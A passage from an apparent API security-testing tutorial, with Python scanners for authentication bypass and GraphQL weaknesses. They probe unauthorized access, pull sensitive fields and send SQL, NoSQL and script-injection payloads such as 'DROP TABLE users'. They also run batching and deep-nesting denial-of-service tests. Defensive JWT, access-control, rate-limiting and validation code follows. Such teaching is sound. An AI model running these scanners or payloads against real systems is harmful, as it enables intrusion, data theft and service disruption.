print(f"\n{test_type.upper()} BYPASSES ({len(bypasses)}):")
for i, bypass in enumerate(bypasses, 1):
endpoint = bypass.get('endpoint', 'Unknown')
if test_type == "no_auth":
print(f" {i}. Endpoint accessible without authentication: {endpoint}")
elif test_type == "header_variation":
variation = bypass.get('variation', {})
print(f" {i}. Endpoint {endpoint} accessible with: {variation}")
elif test_type == "jwt_vulnerability":
token = bypass.get('token', '')
if len(token) > 20:
token = token[:20] + "..."
print(f" {i}. Endpoint {endpoint} accessible with JWT: {token}")
elif test_type == "oauth_vulnerability":
params = bypass.get('params', {})
print(f" {i}. Endpoint {endpoint} accessible with OAuth params: {params}")
elif test_type == "api_key_bypass":
location = bypass.get('location', {})
print(f" {i}. Endpoint {endpoint} accessible with API key in {location.get('type')} {location.get('name')}: {location.get('value')}")
else:
print(f" {i}. Unknown bypass type for endpoint: {endpoint}")
print("\nTotal Tests Run:", len(self.results))
print(f"Full results saved to: {self.output_file}")
print("="*60 + "\n")
# Example usage
def main():
parser = argparse.ArgumentParser(description="API Authentication Bypass Tool")
parser.add_argument("url", help="Base URL of the API to test")
parser.add_argument("-e", "--endpoints", help="Comma-separated list of endpoints to test")
parser.add_argument("-f", "--file", help="File containing endpoints (one per line)")
parser.add_argument("-t", "--token", help="Valid JWT token for comparison tests")
parser.add_argument("-o", "--output", help="Output file for results")
parser.add_argument("-c", "--concurrency", type=int, default=5, help="Number of concurrent threads")
parser.add_argument("-v", "--verbose", action="store_true", help="Enable verbose output")
args = parser.parse_args()
# Get endpoints list
endpoints = []
if args.endpoints:
endpoints = [e.strip() for e in args.endpoints.split(',') if e.strip()]
elif args.file:
try:
with open(args.file, 'r') as f:
endpoints = [line.strip() for line in f if line.strip()]
except Exception as e:
print(f"Error reading endpoints file: {e}")
sys.exit(1)
else:
# Default endpoints to try
endpoints = [
"users", "user", "admin", "admins", "account", "accounts",
"profile", "profiles", "login", "logout", "auth", "authenticate",
"token", "api/users", "api/admin", "api/v1/users", "api/v1/admin",
"v1/users", "v1/user", "v1/admin", "api/account", "api/profile"
]
scanner = APIAuthBypass(
target_url=args.url,
output_file=args.output,
threads=args.concurrency,
verbose=args.verbose
)
if args.concurrency > 1:
scanner.scan_with_threading(endpoints, args.token)
else:
scanner.scan_endpoints(endpoints, args.token)
scanner.print_summary()
if __name__ == "__main__":
main()
GraphQL Security Testing Framework
# GraphQL API Security Testing Framework
import requests
import json
import argparse
import time
import os
import sys
from concurrent.futures import ThreadPoolExecutor
class GraphQLSecurity:
def __init__(self, endpoint, headers=None, output_dir=None, threads=5, verbose=False):
self.endpoint = endpoint
self.headers = headers or {}
self.output_dir = output_dir or "graphql_results"
self.threads = threads
self.verbose = verbose
self.session = requests.Session()
# Ensure headers contain content-type for GraphQL
if 'Content-Type' not in self.headers:
self.headers['Content-Type'] = 'application/json'
# Create output directory if it doesn't exist
if not os.path.exists(self.output_dir):
os.makedirs(self.output_dir)
# Results storage
self.schema = None
self.types = []
self.queries = []
self.mutations = []
self.fields = {}
self.vulnerabilities = []
def log(self, message, level="INFO"):
"""Log messages based on verbosity"""
if self.verbose or level in ["ERROR", "CRITICAL", "WARNING"]:
timestamp = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
print(f"[{timestamp}] [{level}] {message}")
def run_query(self, query, variables=None, operation_name=None):
"""Execute a GraphQL query"""
payload = {
"query": query
}
if variables:
payload["variables"] = variables
if operation_name:
payload["operationName"] = operation_name
try:
response = self.session.post(
self.endpoint,
headers=self.headers,
json=payload,
timeout=30
)
if response.status_code == 200:
return response.json()
else:
self.log(f"Query failed with status code {response.status_code}: {response.text}", "ERROR")
return None
except Exception as e:
self.log(f"Error executing query: {str(e)}", "ERROR")
return None
def get_schema(self):
"""Retrieve the GraphQL schema through introspection"""
self.log("Retrieving GraphQL schema through introspection...")
introspection_query = """
query IntrospectionQuery {
__schema {
queryType {
name
}
mutationType {
name
}
subscriptionType {
name
}
types {
...FullType
}
directives {
name
description
locations
args {
...InputValue
}
}
}
}
fragment FullType on __Type {
kind
name
description
fields(includeDeprecated: true) {
name
description
args {
...InputValue
}
type {
...TypeRef
}
isDeprecated
deprecationReason
}
inputFields {
...InputValue
}
interfaces {
...TypeRef
}
enumValues(includeDeprecated: true) {
name
description
isDeprecated
deprecationReason
}
possibleTypes {
...TypeRef
}
}
fragment InputValue on __InputValue {
name
description
type {
...TypeRef
}
defaultValue
}
fragment TypeRef on __Type {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
}
}
}
}
}
}
}
}
"""
result = self.run_query(introspection_query)
if result and 'data' in result and '__schema' in result['data']:
self.schema = result['data']['__schema']
self.log("Successfully retrieved GraphQL schema")
# Save schema to file
with open(os.path.join(self.output_dir, "schema.json"), 'w') as f:
json.dump(self.schema, f, indent=2)
# Process schema information
self._process_schema()
return True
else:
self.log("Failed to retrieve GraphQL schema. Introspection may be disabled.", "WARNING")
return False
def _process_schema(self):
"""Process the retrieved schema to extract useful information"""
if not self.schema:
return
self.log("Processing schema information...")
# Extract types
for type_info in self.schema['types']:
# Skip introspection types
if type_info['name'].startswith('__'):
continue
# Store type information
self.types.append(type_info)
# Extract fields for this type
if type_info['fields']:
self.fields[type_info['name']] = type_info['fields']
# Find query type
query_type_name = self.schema['queryType']['name']
for type_info in self.types:
if type_info['name'] == query_type_name and type_info['fields']:
self.queries = type_info['fields']
# Find mutation type
if self.schema['mutationType'] and self.schema['mutationType']['name']:
mutation_type_name = self.schema['mutationType']['name']
for type_info in self.types:
if type_info['name'] == mutation_type_name and type_info['fields']:
self.mutations = type_info['fields']
self.log(f"Found {len(self.types)} types, {len(self.queries)} queries, and {len(self.mutations)} mutations")
def get_type_fields(self, type_name):
"""Get fields for a specific type"""
return self.fields.get(type_name, [])
def test_queries(self):
"""Test all available queries for security issues"""
if not self.queries:
self.log("No queries found to test", "WARNING")
return
self.log(f"Testing {len(self.queries)} queries for security issues...")
with ThreadPoolExecutor(max_workers=self.threads) as executor:
executor.map(self.test_query, self.queries)
def test_query(self, query_info):
"""Test a specific query for security issues"""
query_name = query_info['name']
self.log(f"Testing query: {query_name}")
# Craft a minimal query
args = self._build_args_for_query(query_info)
query_string = f"query {{ {query_name}{args} }}"
# Test direct access
self.test_direct_access(query_name, query_string)
# Test for excessive data exposure
self.test_data_exposure(query_name, query_info)
# Test for injection vulnerabilities
self.test_injection(query_name, query_info)
def test_mutations(self):
"""Test all available mutations for security issues"""
if not self.mutations:
self.log("No mutations found to test", "WARNING")
return
self.log(f"Testing {len(self.mutations)} mutations for security issues...")
with ThreadPoolExecutor(max_workers=self.threads) as executor:
executor.map(self.test_mutation, self.mutations)
def test_mutation(self, mutation_info):
"""Test a specific mutation for security issues"""
mutation_name = mutation_info['name']
self.log(f"Testing mutation: {mutation_name}")
# Craft arguments for the mutation
args = self._build_args_for_mutation(mutation_info)
mutation_string = f"mutation {{ {mutation_name}{args} }}"
# Test direct access
self.test_direct_access(mutation_name, mutation_string, is_mutation=True)
# Test for CSRF
self.test_csrf(mutation_name, mutation_info)
# Test for injection vulnerabilities
self.test_injection(mutation_name, mutation_info, is_mutation=True)
def _build_args_for_query(self, query_info):
"""Build arguments string for a query"""
if not query_info['args']:
return ""
args_parts = []
for arg in query_info['args']:
# Generate a value based on the type
value = self._generate_value_for_type(arg['type'])
args_parts.append(f"{arg['name']}: {value}")
if args_parts:
return f"({', '.join(args_parts)})"
return ""
def _build_args_for_mutation(self, mutation_info):
"""Build arguments string for a mutation"""
if not mutation_info['args']:
return ""
args_parts = []
for arg in mutation_info['args']:
# Generate a value based on the type
value = self._generate_value_for_type(arg['type'])
args_parts.append(f"{arg['name']}: {value}")
if args_parts:
return f"({', '.join(args_parts)})"
return ""
def _generate_value_for_type(self, type_info):
"""Generate a test value based on the GraphQL type"""
# Handle non-null wrapper
if type_info['kind'] == 'NON_NULL':
return self._generate_value_for_type(type_info['ofType'])
# Handle list wrapper
if type_info['kind'] == 'LIST':
inner_value = self._generate_value_for_type(type_info['ofType'])
return f"[{inner_value}]"
# Handle scalar types
if type_info['kind'] == 'SCALAR':
type_name = type_info['name']
if type_name == 'Int':
return "1"
elif type_name == 'Float':
return "1.0"
elif type_name == 'String':
return '"test"'
elif type_name == 'Boolean':
return "true"
elif type_name == 'ID':
return '"1"'
else:
return '"test"' # Default for unknown scalar
# Handle enum types
if type_info['kind'] == 'ENUM':
# Try to find the enum type to get a valid value
for type_def in self.types:
if type_def['name'] == type_info['name'] and type_def['enumValues']:
return type_def['enumValues'][0]['name']
return "UNKNOWN_ENUM_VALUE"
# Handle input object types
if type_info['kind'] == 'INPUT_OBJECT':
# Find the input object definition
input_fields = []
for type_def in self.types:
if type_def['name'] == type_info['name'] and type_def['inputFields']:
for field in type_def['inputFields']:
field_value = self._generate_value_for_type(field['type'])
input_fields.append(f"{field['name']}: {field_value}")
break
if input_fields:
return f"{{ {', '.join(input_fields)} }}"
return "{}" # Empty object as fallback
# Default for any other type
return "null"
def test_direct_access(self, operation_name, operation_string, is_mutation=False):
"""Test if an operation can be accessed directly without proper authorization"""
# Try with current credentials
result = self.run_query(operation_string)
# Check if the operation succeeded
if result and 'data' in result and operation_name in result['data'] and result['data'][operation_name] is not None:
# Check if this is a sensitive operation that should be restricted
if any(keyword in operation_name.lower() for keyword in ['admin', 'delete', 'remove', 'update', 'create', 'user', 'account', 'private', 'secret', 'internal']):
vulnerability = {
"type": "unauthorized_access",
"operation": operation_name,
"operation_type": "mutation" if is_mutation else "query",
"severity": "high" if is_mutation else "medium",
"description": f"The {'mutation' if is_mutation else 'query'} '{operation_name}' appears to be accessible without proper authorization.",
"proof": operation_string,
"response": result
}
self.log(f"VULNERABILITY: Unauthorized access to {operation_name}", "CRITICAL")
self.vulnerabilities.append(vulnerability)
def test_data_exposure(self, query_name, query_info):
"""Test if a query exposes sensitive data"""
# Determine the return type of the query
return_type = query_info['type']
# Get to the base type (unwrap NON_NULL and LIST wrappers)
while return_type['kind'] in ['NON_NULL', 'LIST']:
return_type = return_type['ofType']
# If it's not an object type, skip
if return_type['kind'] != 'OBJECT':
return
type_name = return_type['name']
# Get fields for this type
type_fields = self.get_type_fields(type_name)
if not type_fields:
return
# Look for sensitive field names
sensitive_fields = []
for field in type_fields:
field_name = field['name'].lower()
if any(keyword in field_name for keyword in ['password', 'token', 'secret', 'key', 'auth', 'credit', 'ssn', 'social', 'private', 'hidden']):
sensitive_fields.append(field['name'])
if not sensitive_fields:
return
# Craft a query requesting these fields
field_string = " ".join(sensitive_fields)
query_string = f"query {{ {query_name} {{ {field_string} }} }}"
# Run the query
result = self.run_query(query_string)
# Check if we got sensitive data
if result and 'data' in result and query_name in result['data'] and result['data'][query_name] is not None:
# Check if any of the sensitive fields have values
data = result['data'][query_name]
exposed_fields = []
if isinstance(data, dict):
for field in sensitive_fields:
if field in data and data[field] is not None and data[field] != "":
exposed_fields.append(field)
elif isinstance(data, list) and data:
for item in data:
if isinstance(item, dict):
for field in sensitive_fields:
if field in item and item[field] is not None and item[field] != "":
exposed_fields.append(field)
break
if exposed_fields:
vulnerability = {
"type": "sensitive_data_exposure",
"operation": query_name,
"severity": "high",
"description": f"The query '{query_name}' exposes sensitive fields: {', '.join(exposed_fields)}",
"proof": query_string,
"exposed_fields": exposed_fields,
"response": result
}
self.log(f"VULNERABILITY: Sensitive data exposure in {query_name}: {', '.join(exposed_fields)}", "CRITICAL")
self.vulnerabilities.append(vulnerability)
def test_injection(self, operation_name, operation_info, is_mutation=False):
"""Test for injection vulnerabilities in operation arguments"""
if not operation_info['args']:
return
# Test each argument for injection vulnerabilities
for arg in operation_info['args']:
arg_name = arg['name']
arg_type = arg['type']
# Only test string arguments
base_type = arg_type
while base_type['kind'] in ['NON_NULL', 'LIST']:
base_type = base_type['ofType']
if base_type['name'] != 'String':
continue
# Test with various injection payloads
payloads = [
"' OR 1=1 --",
"\\\"; DROP TABLE users; --",
"${process.env.NODE_ENV}",
"'; return true; /*",
"</script><script>alert(1)</script>",
"'; return db.users.find(); /*"
]
for payload in payloads:
# Craft operation with the payload
args_str = f"({arg_name}: \"{payload}\")"
operation_string = f"{'mutation' if is_mutation else 'query'} {{ {operation_name}{args_str} }}"
# Run the operation
result = self.run_query(operation_string)
# Check for signs of successful injection
if result:
# Check for error messages indicating injection vulnerability
if 'errors' in result:
for error in result['errors']:
error_msg = error.get('message', '').lower()
# Look for error messages that suggest SQL/NoSQL injection
if any(keyword in error_msg for keyword in ['sql', 'syntax', 'mongo', 'database', 'invalid query', 'unexpected token']):
vulnerability = {
"type": "injection_vulnerability",
"operation": operation_name,
"operation_type": "mutation" if is_mutation else "query",
"argument": arg_name,
"payload": payload,
"severity": "critical",
"description": f"The {'mutation' if is_mutation else 'query'} '{operation_name}' appears vulnerable to injection through the '{arg_name}' argument.",
"proof": operation_string,
"error": error
}
self.log(f"VULNERABILITY: Injection in {operation_name} via {arg_name}", "CRITICAL")
self.vulnerabilities.append(vulnerability)
break
# If we got successful response, check if it's unexpected
elif 'data' in result and operation_name in result['data'] and result['data'][operation_name]:
# If this is a mutation that succeeded with an injection payload, that's suspicious
if is_mutation and any(keyword in payload for keyword in ["'", "\""]):
vulnerability = {
"type": "potential_injection_vulnerability",
"operation": operation_name,
"operation_type": "mutation",
"argument": arg_name,
"payload": payload,
"severity": "high",
"description": f"The mutation '{operation_name}' accepted a payload with quotes in the '{arg_name}' argument, suggesting potential insufficient input validation.",
"proof": operation_string,
"response": result
}
self.log(f"VULNERABILITY: Potential injection in {operation_name} via {arg_name}", "CRITICAL")
self.vulnerabilities.append(vulnerability)
def test_csrf(self, mutation_name, mutation_info):
"""Test if a mutation is vulnerable to CSRF"""
# Create a simple request to test if mutation works without CSRF protection
args = self._build_args_for_mutation(mutation_info)
mutation_string = f"mutation {{ {mutation_name}{args} }}"
# First try with normal request (with all headers)
result1 = self.run_query(mutation_string)
# Now try with minimal headers (simulate CSRF scenario)
minimal_headers = {'Content-Type': 'application/json'}
try:
response = requests.post(
self.endpoint,
headers=minimal_headers,
json={"query": mutation_string},
timeout=30
)
if response.status_code == 200:
result2 = response.json()
# Check if both requests worked, suggesting no CSRF protection
if (result1 and 'data' in result1 and mutation_name in result1['data'] and
result2 and 'data' in result2 and mutation_name in result2['data']):
vulnerability = {
"type": "csrf_vulnerability",
"operation": mutation_name,
"severity": "high",
"description": f"The mutation '{mutation_name}' appears to be vulnerable to CSRF as it works without session-specific headers.",
"proof": mutation_string,
"response": result2
}
self.log(f"VULNERABILITY: CSRF vulnerability in {mutation_name}", "CRITICAL")
self.vulnerabilities.append(vulnerability)
except Exception as e:
self.log(f"Error testing CSRF for {mutation_name}: {str(e)}", "ERROR")
def test_batching(self):
"""Test if the API is vulnerable to batch attacks"""
if not self.queries:
return
self.log("Testing for GraphQL batching/DoS vulnerabilities...")
# Pick a simple query to use for batching
query = None
for q in self.queries:
if not q['args']: # prefer queries without arguments
query = q
break
if not query:
query = self.queries[0]
query_name = query['name']
# Create a simple query
simple_query = f"query {{ {query_name} }}"
# Create batched queries of increasing size
batch_sizes = [5, 20, 50, 100]
for size in batch_sizes:
# Create an array of the same query
batch = [{"query": simple_query} for _ in range(size)]
self.log(f"Testing batch of {size} queries...")
try:
start_time = time.time()
response = requests.post(
self.endpoint,
headers=self.headers,
json=batch,
timeout=60
)
end_time = time.time()
execution_time = end_time - start_time
if response.status_code == 200:
try:
results = response.json()
# Check if batching worked
if isinstance(results, list) and len(results) == size:
vulnerability = {
"type": "batch_query_vulnerability",
"batch_size": size,
"execution_time": execution_time,
"severity": "medium",
"description": f"The API allows batching {size} queries in a single request, which could be used for DoS attacks or resource exhaustion.",
"proof": f"Batch of {size} '{query_name}' queries",
}
self.log(f"VULNERABILITY: Batch query vulnerability with size {size}, executed in {execution_time:.2f} seconds", "WARNING")
self.vulnerabilities.append(vulnerability)
except Exception as e:
self.log(f"Error parsing batched response: {str(e)}", "ERROR")
except Exception as e:
self.log(f"Error testing batch size {size}: {str(e)}", "ERROR")
def test_query_depth(self):
"""Test if the API is vulnerable to deep nested queries"""
if not self.types:
return
self.log("Testing for nested query/DoS vulnerabilities...")
# Find a type with recursive potential (references itself or can be nested)
recursive_type = None
recursive_field = None
for type_info in self.types:
if type_info['kind'] != 'OBJECT' or not type_info['fields']:
continue
type_name = type_info['name']
for field in type_info['fields']:
field_type = field['type']
# Get to the base type
while field_type['kind'] in ['NON_NULL', 'LIST']:
field_type = field_type['ofType']
# Check if this field references back to the same type
# or any type that has a field referencing this type
if field_type['kind'] == 'OBJECT' and (field_type['name'] == type_name or
any(f['type']['name'] == type_name for t in self.types
for f in (t['fields'] or []) if t['name'] == field_type['name'])):
recursive_type = type_name
recursive_field = field['name']
break
if recursive_type:
break
if not recursive_type or not recursive_field:
self.log("Could not find recursive types for nested query test", "WARNING")
return
# Find a query that returns this type
query_for_type = None
for query in self.queries:
return_type = query['type']
# Get to the base type
while return_type['kind'] in ['NON_NULL', 'LIST']:
return_type = return_type['ofType']
if return_type['kind'] == 'OBJECT' and return_type['name'] == recursive_type:
query_for_type = query
break
if not query_for_type:
self.log(f"Could not find a query returning the recursive type {recursive_type}", "WARNING")
return
# Create nested queries of increasing depth
depths = [5, 10, 20, 50]
for depth in depths:
# Create the nested field selection
nested_fields = recursive_field
for _ in range(depth):
nested_fields = f"{recursive_field} {{ {nested_fields} }}"
query_string = f"query {{ {query_for_type['name']} {{ {nested_fields} }} }}"
self.log(f"Testing nested query with depth {depth}...")
try:
start_time = time.time()
result = self.run_query(query_string)
end_time = time.time()
execution_time = end_time - start_time
# If query didn't fail, it may be vulnerable
if result and 'data' in result and query_for_type['name'] in result['data']:
vulnerability = {
"type": "nested_query_vulnerability",
"depth": depth,
"execution_time": execution_time,
"severity": "medium",
"description": f"The API allows deeply nested queries (depth {depth}), which could be used for DoS attacks.",
"proof": query_string,
}
self.log(f"VULNERABILITY: Nested query vulnerability with depth {depth}, executed in {execution_time:.2f} seconds", "WARNING")
self.vulnerabilities.append(vulnerability)
except Exception as e:
self.log(f"Error testing depth {depth}: {str(e)}", "ERROR")
def save_vulnerabilities(self):
"""Save found vulnerabilities to file"""
if not self.vulnerabilities:
self.log("No vulnerabilities found to save")
return
output_file = os.path.join(self.output_dir, "vulnerabilities.json")
with open(output_file, 'w') as f:
json.dump({
"endpoint": self.endpoint,
"timestamp": time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),
"vulnerabilities": self.vulnerabilities
}, f, indent=2)
self.log(f"Saved {len(self.vulnerabilities)} vulnerabilities to {output_file}")
def generate_report(self):
"""Generate a comprehensive security report"""
report_file = os.path.join(self.output_dir, "report.md")
with open(report_file, 'w') as f:
f.write(f"# GraphQL Security Assessment Report\n\n")
f.write(f"**Endpoint:** {self.endpoint} \n")
f.write(f"**Date:** {time.strftime('%Y-%m-%d %H:%M:%S', time.localtime())} \n\n")
f.write("## Summary\n\n")
if self.schema:
f.write(f"- API uses GraphQL {self.schema.get('schemaVersion', 'unknown version')} \n")
f.write(f"- Found {len(self.types)} types \n")
f.write(f"- Found {len(self.queries)} queries \n")
f.write(f"- Found {len(self.mutations)} mutations \n")
else:
f.write("- Failed to retrieve schema (introspection might be disabled) \n")
f.write(f"- Found {len(self.vulnerabilities)} security vulnerabilities \n\n")
# Group vulnerabilities by severity
vulnerabilities_by_severity = {
"critical": [],
"high": [],
"medium": [],
"low": []
}
for vuln in self.vulnerabilities:
severity = vuln.get("severity", "medium")
vulnerabilities_by_severity[severity].append(vuln)
f.write("## Vulnerabilities\n\n")
for severity in ["critical", "high", "medium", "low"]:
vulns = vulnerabilities_by_severity[severity]
if not vulns:
continue
f.write(f"### {severity.capitalize()} Severity ({len(vulns)})\n\n")
for i, vuln in enumerate(vulns, 1):
f.write(f"#### {i}. {vuln['type'].replace('_', ' ').title()}\n\n")
f.write(f"**Operation:** {vuln.get('operation', 'N/A')} \n")
if 'operation_type' in vuln:
f.write(f"**Type:** {vuln['operation_type']} \n")
if 'argument' in vuln:
f.write(f"**Argument:** {vuln['argument']} \n")
f.write(f"**Description:** {vuln['description']} \n")
f.write(f"**Proof:** `{vuln.get('proof', 'N/A')}` \n\n")
f.write("## Recommendations\n\n")
# Add recommendations based on found vulnerabilities
recommendations = set()
for vuln in self.vulnerabilities:
vuln_type = vuln.get('type')
if vuln_type == 'unauthorized_access':
recommendations.add("Implement proper authorization checks for all operations")
elif vuln_type == 'sensitive_data_exposure':
recommendations.add("Apply field-level authorization to prevent exposure of sensitive data")
elif vuln_type == 'injection_vulnerability':
recommendations.add("Implement input validation and sanitization for all arguments")
elif vuln_type == 'csrf_vulnerability':
recommendations.add("Add CSRF protection mechanisms such as tokens or SameSite cookies")
elif vuln_type == 'batch_query_vulnerability':
recommendations.add("Implement limits on batched queries or disable batching")
elif vuln_type == 'nested_query_vulnerability':
recommendations.add("Implement query depth limits to prevent deeply nested queries")
# Add default recommendations
recommendations.add("Disable introspection in production unless absolutely necessary")
recommendations.add("Implement query complexity analysis to prevent DoS attacks")
recommendations.add("Use a GraphQL-specific security library or middleware")
for i, recommendation in enumerate(recommendations, 1):
f.write(f"{i}. {recommendation} \n")
self.log(f"Generated security report at {report_file}")
return report_file
def run_all_tests(self):
"""Run all security tests"""
# Get schema first
self.get_schema()
# Run tests
self.test_queries()
self.test_mutations()
self.test_batching()
self.test_query_depth()
# Save results
self.save_vulnerabilities()
# Generate report
self.generate_report()
# Print summary
self.print_summary()
def print_summary(self):
"""Print a summary of findings"""
print("\n" + "="*60)
print(f"GRAPHQL SECURITY ASSESSMENT SUMMARY FOR {self.endpoint}")
print("="*60)
if self.schema:
print(f"\nSchema Information:")
print(f" - Types: {len(self.types)}")
print(f" - Queries: {len(self.queries)}")
print(f" - Mutations: {len(self.mutations)}")
else:
print("\nSchema: Failed to retrieve (introspection might be disabled)")
print(f"\nVulnerabilities Found: {len(self.vulnerabilities)}")
# Group by type
vuln_types = {}
for vuln in self.vulnerabilities:
vuln_type = vuln.get('type', 'Unknown')
vuln_types[vuln_type] = vuln_types.get(vuln_type, 0) + 1
# Group by severity
vuln_severities = {}
for vuln in self.vulnerabilities:
severity = vuln.get('severity', 'Unknown')
vuln_severities[severity] = vuln_severities.get(severity, 0) + 1
if vuln_types:
print("\nVulnerabilities by Type:")
for vuln_type, count in vuln_types.items():
print(f" - {vuln_type.replace('_', ' ').title()}: {count}")
if vuln_severities:
print("\nVulnerabilities by Severity:")
for severity in ["critical", "high", "medium", "low"]:
if severity in vuln_severities:
print(f" - {severity.capitalize()}: {vuln_severities[severity]}")
print(f"\nResults saved to: {self.output_dir}")
print("="*60 + "\n")
# Example usage
def main():
parser = argparse.ArgumentParser(description="GraphQL API Security Testing Tool")
parser.add_argument("endpoint", help="GraphQL API endpoint URL")
parser.add_argument("-H", "--header", action="append", help="HTTP headers in format 'Name: Value'")
parser.add_argument("-o", "--output", help="Output directory for results")
parser.add_argument("-t", "--threads", type=int, default=5, help="Number of concurrent threads")
parser.add_argument("-v", "--verbose", action="store_true", help="Enable verbose output")
args = parser.parse_args()
# Parse headers
headers = {}
if args.header:
for header in args.header:
if ":" in header:
name, value = header.split(":", 1)
headers[name.strip()] = value.strip()
else:
print(f"Warning: Invalid header format: {header}")
# Create and run the GraphQL security scanner
scanner = GraphQLSecurity(
endpoint=args.endpoint,
headers=headers,
output_dir=args.output,
threads=args.threads,
verbose=args.verbose
)
scanner.run_all_tests()
if __name__ == "__main__":
main()
Hands-On Challenge #4: Custom Tool Development
Try This: Extend one of the custom frameworks above to add a feature such as:
- Rate limiting detection module
- Authentication token brute force module
- API documentation generator based on discovered endpoints
- Report generation with severity ratings and remediation advice
Defense Perspective: API Security Hardening
As security professionals, we should not only identify vulnerabilities but also recommend effective defenses. Here are key strategies for hardening API security.
Authentication Best Practices
- Use Strong Authentication Standards:
- Implement OAuth 2.0 with appropriate flows (e.g., Authorization Code with PKCE for SPAs)
- Use OpenID Connect for authentication
- Implement JWT best practices (proper signing, expiration, audience validation)
- Secure Token Implementation:
// TypeScript example of secure JWT implementation
import jwt from 'jsonwebtoken';
import crypto from 'crypto';
class TokenManager {
private readonly secret: Buffer;
private readonly algorithm = 'HS256';
private readonly issuer = 'api.yourdomain.com';
private readonly audience = 'your-client-id';
constructor() {
// Use a strong, environment-specific secret
const secretKey = process.env.JWT_SECRET;
if (!secretKey || secretKey.length < 32) {
throw new Error('JWT_SECRET environment variable must be set with at least 32 characters');
}
this.secret = Buffer.from(secretKey, 'base64');
}
generateToken(userId: string, role: string): string {
const now = Math.floor(Date.now() / 1000);
return jwt.sign(
{
sub: userId,
role: role,
jti: crypto.randomBytes(16).toString('hex'), // Unique token ID
iat: now,
exp: now + 3600, // 1 hour expiration
iss: this.issuer,
aud: this.audience
},
this.secret,
{ algorithm: this.algorithm }
);
}
validateToken(token: string): any {
try {
return jwt.verify(token, this.secret, {
algorithms: [this.algorithm],
issuer: this.issuer,
audience: this.audience
});
} catch (error) {
throw new Error(`Token validation failed: ${error.message}`);
}
}
refreshToken(token: string): string {
const payload = this.validateToken(token);
// Prevent refresh if token is about to expire
const now = Math.floor(Date.now() / 1000);
if (payload.exp - now < 300) { // Less than 5 minutes remaining
throw new Error('Token too close to expiration for refresh');
}
// Create new token with same data but new expiration
return this.generateToken(payload.sub, payload.role);
}
}
export default new TokenManager();
Authorization Implementation
- Role-Based Access Control (RBAC):
// Express middleware for RBAC
function requireRole(role) {
return (req, res, next) => {
const user = req.user; // Assumes previous middleware set this
if (!user) {
return res.status(401).json({ error: 'Authentication required' });
}
if (typeof role === 'string' && user.role !== role) {
return res.status(403).json({ error: 'Insufficient permissions' });
}
if (Array.isArray(role) && !role.includes(user.role)) {
return res.status(403).json({ error: 'Insufficient permissions' });
}
next();
};
}
// Usage in routes
app.get('/api/users', requireRole('admin'), (req, res) => {
// Only admins can access this endpoint
});
app.get('/api/reports', requireRole(['admin', 'manager']), (req, res) => {
// Both admins and managers can access this endpoint
});
- Attribute-Based Access Control (ABAC):
// TypeScript ABAC implementation
interface Resource {
id: string;
ownerId: string;
type: string;
public: boolean;
status: string;
}
interface User {
id: string;
role: string;
department: string;
region: string;
}
class AccessControl {
canAccess(user: User, action: string, resource: Resource): boolean {
// Global admin can do anything
if (user.role === 'admin') {
return true;
}
// Owner can always access their own resources
if (resource.ownerId === user.id) {
return true;
}
// Public resources can be read by anyone
if (action === 'read' && resource.public === true) {
return true;
}
// Department-specific rules
if (user.role === 'manager') {
// Managers can read any resource in their department
if (action === 'read' && resource.department === user.department) {
return true;
}
// Managers can update resources in their department if they're in draft
if (action === 'update' &&
resource.department === user.department &&
resource.status === 'draft') {
return true;
}
}
// Region-specific rules
if (user.role === 'regional_admin' && resource.region === user.region) {
return true;
}
// Default deny
return false;
}
}
// Usage
const accessControl = new AccessControl();
const user = getCurrentUser();
const resource = getRequestedResource();
if (accessControl.canAccess(user, 'update', resource)) {
// Allow the operation
} else {
// Deny with 403 Forbidden
}
Rate Limiting Implementation
// Rate limiting with Redis in Express
const redis = require('redis');
const { promisify } = require('util');
const redisClient = redis.createClient(process.env.REDIS_URL);
const incrAsync = promisify(redisClient.incr).bind(redisClient);
const expireAsync = promisify(redisClient.expire).bind(redisClient);
async function rateLimiter(req, res, next) {
try {
// Create a unique key based on IP or user ID
const key = req.user ? `ratelimit:user:${req.user.id}` : `ratelimit:ip:${req.ip}`;
// Increment the counter
const count = await incrAsync(key);
// Set expiration if this is the first request in the window
if (count === 1) {
await expireAsync(key, 60); // 60 second window
}
// Add rate limit headers
res.setHeader('X-RateLimit-Limit', '100');
res.setHeader('X-RateLimit-Remaining', Math.max(0, 100 - count));
// Check if over limit
if (count > 100) {
return res.status(429).json({
error: 'Rate limit exceeded',
retryAfter: 60 // Seconds until reset
});
}
next();
} catch (error) {
// If Redis fails, we'll still allow the request to proceed
console.error('Rate limiting error:', error);
next();
}
}
// Use the middleware
app.use(rateLimiter);
Input Validation
- Schema Validation:
// Using Joi for schema validation
const Joi = require('joi');
// Define schema for user creation
const createUserSchema = Joi.object({
username: Joi.string().alphanum().min(3).max(30).required(),
email: Joi.string().email().required(),
password: Joi.string().pattern(new RegExp('^[a-zA-Z0-9]{8,30} )).required(),
role: Joi.string().valid('user', 'admin').default('user'),
age: Joi.number().integer().min(18).max(120),
settings: Joi.object({
newsletter: Joi.boolean().default(false),
theme: Joi.string().valid('light', 'dark').default('light')
}).default({})
});
// Middleware for validation
function validateRequest(schema) {
return (req, res, next) => {
const { error, value } = schema.validate(req.body, {
abortEarly: false, // Return all errors, not just the first
stripUnknown: true // Remove unknown properties
});
if (error) {
const errorMessages = error.details.map(detail => detail.message);
return res.status(400).json({
error: 'Validation Error',
details: errorMessages
});
}
// Replace req.body with validated value
req.body = value;
next();
};
}
// Use in route
app.post('/api/users', validateRequest(createUserSchema), (req, res) => {
// Handler code - req.body now contains validated data
});
- GraphQL Input Validation:
// Using graphql-shield for permission/validation rules
const { shield, rule, and, or } = require('graphql-shield');
const { makeExecutableSchema } = require('@graphql-tools/schema');
const { applyMiddleware } = require('graphql-middleware');
// Define validation rules
const isValidEmail = rule()(async (parent, args, ctx, info) => {
return /^[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,}$/i.test(args.email) ||
'Invalid email format';
});
const isStrongPassword = rule()(async (parent, args, ctx, info) => {
// Min 8 chars, at least one uppercase, one lowercase, one number
return /^(?=.*[a-z])(?=.*[A-Z])(?=.*\d)[a-zA-Z\d]{8,}$/.test(args.password) ||
'Password must be at least 8 characters with uppercase, lowercase, and number';
});
// Define GraphQL permissions/validations
const permissions = shield({
Query: {
user: isAuthenticated,
